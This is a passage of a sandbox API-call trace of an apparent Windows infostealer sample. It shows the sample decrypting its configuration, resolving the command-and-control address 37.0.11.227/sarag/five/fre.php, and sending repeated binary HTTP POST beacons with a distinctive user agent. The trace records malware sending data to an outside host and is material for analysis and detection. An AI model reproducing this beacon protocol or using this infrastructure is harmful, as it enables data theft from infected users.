0x690000 [0258.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0258.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.983] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0258.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.984] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0258.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.985] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0258.986] GetProcessHeap () returned 0x690000 [0258.986] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0258.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.987] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0258.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.988] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0258.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.991] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0258.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.992] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0258.992] GetProcessHeap () returned 0x690000 [0258.992] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0258.992] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0258.992] GetProcessHeap () returned 0x690000 [0258.993] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0258.993] GetProcessHeap () returned 0x690000 [0258.993] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0258.993] GetProcessHeap () returned 0x690000 [0258.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0258.995] GetProcessHeap () returned 0x690000 [0258.995] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0258.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.996] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.002] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0259.009] GetProcessHeap () returned 0x690000 [0259.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0259.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.012] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0259.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.014] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.015] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.015] GetProcessHeap () returned 0x690000 [0259.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0259.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.017] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0259.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.018] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0259.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.019] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0259.020] GetProcessHeap () returned 0x690000 [0259.020] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0259.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.021] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0259.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.024] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0259.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.025] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0259.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.026] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0259.027] GetProcessHeap () returned 0x690000 [0259.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0259.027] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0259.027] GetProcessHeap () returned 0x690000 [0259.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0259.027] socket (af=2, type=1, protocol=6) returned 0x774 [0259.027] connect (s=0x774, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0259.053] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0259.053] GetProcessHeap () returned 0x690000 [0259.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0259.057] GetProcessHeap () returned 0x690000 [0259.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0259.058] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0259.060] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0259.060] GetProcessHeap () returned 0x690000 [0259.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0259.060] GetProcessHeap () returned 0x690000 [0259.061] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0259.061] GetProcessHeap () returned 0x690000 [0259.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0259.061] GetProcessHeap () returned 0x690000 [0259.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0259.062] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0259.066] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0259.066] GetProcessHeap () returned 0x690000 [0259.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0259.066] GetProcessHeap () returned 0x690000 [0259.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0259.067] send (s=0x774, buf=0x6ad508*, len=242, flags=0) returned 242 [0259.068] send (s=0x774, buf=0x6aba40*, len=159, flags=0) returned 159 [0259.068] GetProcessHeap () returned 0x690000 [0259.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0259.068] recv (in: s=0x774, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0259.143] GetProcessHeap () returned 0x690000 [0259.150] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0259.150] GetProcessHeap () returned 0x690000 [0259.150] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0259.150] GetProcessHeap () returned 0x690000 [0259.150] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0259.150] GetProcessHeap () returned 0x690000 [0259.150] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0259.151] closesocket (s=0x774) returned 0 [0259.154] GetProcessHeap () returned 0x690000 [0259.154] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0259.154] GetProcessHeap () returned 0x690000 [0259.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0259.155] GetProcessHeap () returned 0x690000 [0259.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0259.155] GetProcessHeap () returned 0x690000 [0259.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0259.156] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1518) returned 0x774 [0259.161] Sleep (dwMilliseconds=0xea60) [0259.163] GetProcessHeap () returned 0x690000 [0259.163] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0259.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.164] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.171] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0259.180] GetProcessHeap () returned 0x690000 [0259.180] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0259.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.181] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0259.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.191] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.192] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.192] GetProcessHeap () returned 0x690000 [0259.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0259.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.195] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0259.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.196] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0259.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.197] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0259.197] GetProcessHeap () returned 0x690000 [0259.197] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0259.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.198] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0259.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.200] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0259.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.201] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0259.202] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.202] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0259.202] GetProcessHeap () returned 0x690000 [0259.202] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0259.203] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0259.203] GetProcessHeap () returned 0x690000 [0259.204] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0259.204] GetProcessHeap () returned 0x690000 [0259.204] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0259.204] GetProcessHeap () returned 0x690000 [0259.205] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0259.205] GetProcessHeap () returned 0x690000 [0259.205] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0259.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.206] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.212] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0259.221] GetProcessHeap () returned 0x690000 [0259.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0259.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.222] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0259.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.223] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.224] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.224] GetProcessHeap () returned 0x690000 [0259.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0259.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.226] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0259.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.227] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0259.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.228] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0259.228] GetProcessHeap () returned 0x690000 [0259.228] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0259.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.229] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0259.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.233] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0259.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.234] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0259.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.236] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0259.236] GetProcessHeap () returned 0x690000 [0259.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0259.236] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0259.236] GetProcessHeap () returned 0x690000 [0259.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0259.236] socket (af=2, type=1, protocol=6) returned 0x778 [0259.236] connect (s=0x778, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0259.265] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0259.265] GetProcessHeap () returned 0x690000 [0259.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0259.265] GetProcessHeap () returned 0x690000 [0259.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0259.266] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0259.267] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0259.267] GetProcessHeap () returned 0x690000 [0259.267] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0259.267] GetProcessHeap () returned 0x690000 [0259.268] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0259.268] GetProcessHeap () returned 0x690000 [0259.268] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0259.268] GetProcessHeap () returned 0x690000 [0259.268] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0259.268] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0259.269] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0259.269] GetProcessHeap () returned 0x690000 [0259.269] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0259.270] GetProcessHeap () returned 0x690000 [0259.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0259.270] send (s=0x778, buf=0x6ad508*, len=242, flags=0) returned 242 [0259.271] send (s=0x778, buf=0x6aba40*, len=159, flags=0) returned 159 [0259.271] GetProcessHeap () returned 0x690000 [0259.271] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0259.271] recv (in: s=0x778, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0259.365] GetProcessHeap () returned 0x690000 [0259.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0259.366] GetProcessHeap () returned 0x690000 [0259.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0259.366] GetProcessHeap () returned 0x690000 [0259.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0259.367] GetProcessHeap () returned 0x690000 [0259.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0259.367] closesocket (s=0x778) returned 0 [0259.367] GetProcessHeap () returned 0x690000 [0259.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0259.368] GetProcessHeap () returned 0x690000 [0259.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0259.368] GetProcessHeap () returned 0x690000 [0259.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0259.368] GetProcessHeap () returned 0x690000 [0259.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0259.369] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1520) returned 0x778 [0259.370] Sleep (dwMilliseconds=0xea60) [0259.372] GetProcessHeap () returned 0x690000 [0259.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0259.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.376] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.381] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0259.393] GetProcessHeap () returned 0x690000 [0259.393] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0259.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.398] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0259.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.399] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.400] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.400] GetProcessHeap () returned 0x690000 [0259.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0259.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.401] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0259.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.401] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0259.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.402] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0259.402] GetProcessHeap () returned 0x690000 [0259.402] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0259.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.403] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0259.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.404] StrStrA 